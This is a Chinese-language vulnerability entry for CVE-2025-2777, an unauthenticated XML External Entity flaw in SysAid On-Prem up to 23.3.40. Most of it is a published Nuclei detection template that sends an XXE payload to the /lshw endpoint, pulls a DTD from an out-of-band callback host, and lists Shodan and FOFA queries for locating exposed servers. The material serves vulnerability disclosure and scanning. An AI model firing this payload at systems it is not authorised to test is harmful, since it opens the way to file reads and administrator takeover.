漏洞描述
SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the lshw processing functionality, allowing for administrator account takeover and file read primitives.
CVE-2025-2777: SysAid On-Prem <= 23.3.40 - XML External Entity
PoC代码[已公开]
id: CVE-2025-2777
info:
name: SysAid On-Prem <= 23.3.40 - XML External Entity
author: johnk3r
severity: critical
description: |
SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the lshw processing functionality, allowing for administrator account takeover and file read primitives.
reference:
- https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/
- https://documentation.sysaid.com/docs/24-40-60
classification:
epss-score: 0.14526
epss-percentile: 0.94225
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
cvss-score: 9.3
cve-id: CVE-2025-2777
cwe-id: CWE-611
metadata:
max-request: 1
vendor: sysaid
product: sysaid
shodan-query: http.favicon.hash:"1540720428"
fofa-query: icon_hash=1540720428
tags: cve,cve2025,oast,sysaid,xxe,vkev
variables:
filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /lshw?osVer=a&osCode=b&osKernel=c&agentVersion=e&serial=f HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY % foo SYSTEM "http://{{interactsh-url}}/{{filename}}.dtd">
%foo;
]>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: Java"
# digest: 4a0a0047304502200a8dbf36d94c7c06deddfb45e40680b4c8230bc3956154e8c12af4995a473769022100f0f5dd7518d09c94b7e74e7ee2c3fcec408257abda8c238cf6bd374efa92e139:922c64590222798bb761d5b6d8e72950